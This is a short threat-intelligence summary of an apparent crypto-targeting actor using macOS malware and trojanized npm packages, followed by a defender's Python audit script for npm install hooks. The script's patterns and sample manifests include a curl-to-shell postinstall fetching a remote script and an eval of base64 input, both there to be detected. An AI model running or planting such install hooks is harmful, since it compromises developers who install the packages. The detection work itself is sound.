A new threat actor, designated Jinx-0164, has been identified targeting cryptocurrency companies with custom macOS malware. This actor utilizes tactics similar to North Korean groups but operates independently without shared infrastructure. Intrusions typically commence via fake LinkedIn profiles, leading victims to phishing meetings where malware is installed under the guise of a software fix.
The malware, named Audiofix, is a Python-based stealer and remote access tool that harvests sensitive information and hijacks communication platforms. Jinx-0164 also abuses GitHub tokens to inject backdoors into development infrastructure, propagating the malware through compromised repositories. The group is known for its recruitment-themed lures and has trojanized popular npm packages; defenders are urged to monitor for suspicious activity and for the associated indicators of compromise.
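Trojanized npm packages typically deliver their payload through install-time lifecycle hooks (`preinstall`, `install`, `postinstall`, `prepare`), which npm runs automatically on `npm install`. The following added example, which is not part of the report summarised above and uses no indicators from it, is a defender-side audit: it walks a set of `package.json` manifests and flags install hooks whose commands match a small set of heuristic patterns. The manifests, package names and patterns are all constructed for illustration.

```python
"""Heuristic audit of npm install-time lifecycle scripts (added example).

Flags preinstall/install/postinstall/prepare hooks whose command text
matches suspicious patterns. Patterns and sample manifests are
constructed for illustration; they are not indicators from the report.
"""
import json
import re

# npm lifecycle hooks that execute automatically during installation.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Illustrative heuristic rules (constructed; tune to your environment).
SUSPICIOUS_PATTERNS = {
    # download a script and pipe it straight into a shell
    "remote-fetch-to-shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
    # inline Node code that evaluates a constructed string
    "inline-node-eval": re.compile(r"\bnode\s+-e\b.*\beval\("),
    # base64 decoding inside an install hook is rarely legitimate
    "base64-decode": re.compile(r"base64", re.IGNORECASE),
    # writes into hidden dot-directories under the home or temp dir
    "hidden-path-write": re.compile(r"(~|\$HOME|/tmp)/\.\w+"),
}


def scan_manifest(manifest: dict) -> list[dict]:
    """Return one finding per (hook, rule) match in a parsed package.json."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        for rule, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(command):
                findings.append({
                    "package": manifest.get("name", "<unnamed>"),
                    "version": manifest.get("version", "?"),
                    "hook": hook,
                    "rule": rule,
                    "command": command,
                })
    return findings


def scan_manifest_file(path: str) -> list[dict]:
    """Load a package.json from disk and scan it."""
    with open(path, encoding="utf-8") as fh:
        return scan_manifest(json.load(fh))


def audit_all(manifests: list[dict]) -> list[dict]:
    """Scan a list of parsed manifests (e.g. every node_modules/*/package.json)."""
    results = []
    for manifest in manifests:
        results.extend(scan_manifest(manifest))
    return results


# Constructed sample manifests: one benign native addon and two that
# mimic the kind of install hook a trojanized package would carry.
SAMPLE_MANIFESTS = [
    {"name": "native-addon-demo", "version": "1.0.0",
     "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"}},
    {"name": "utils-helper-demo", "version": "2.3.1",
     "scripts": {"postinstall": "curl -s https://example.invalid/setup.sh | sh"}},
    {"name": "color-theme-demo", "version": "0.9.0",
     "scripts": {"preinstall":
                 "node -e \"eval(Buffer.from('BASE64_PLACEHOLDER','base64').toString())\""}},
]


if __name__ == "__main__":
    for finding in audit_all(SAMPLE_MANIFESTS):
        print(f"[{finding['rule']}] {finding['package']}@{finding['version']} "
              f"{finding['hook']}: {finding['command']}")
```

Run against a checkout by feeding every `node_modules/*/package.json` (and the project's own) through `scan_manifest_file`; a hit is a prompt for review, not proof of compromise, since legitimate native modules also use install hooks. Pair this with `npm install --ignore-scripts` in CI and an allow-list of packages permitted to run hooks.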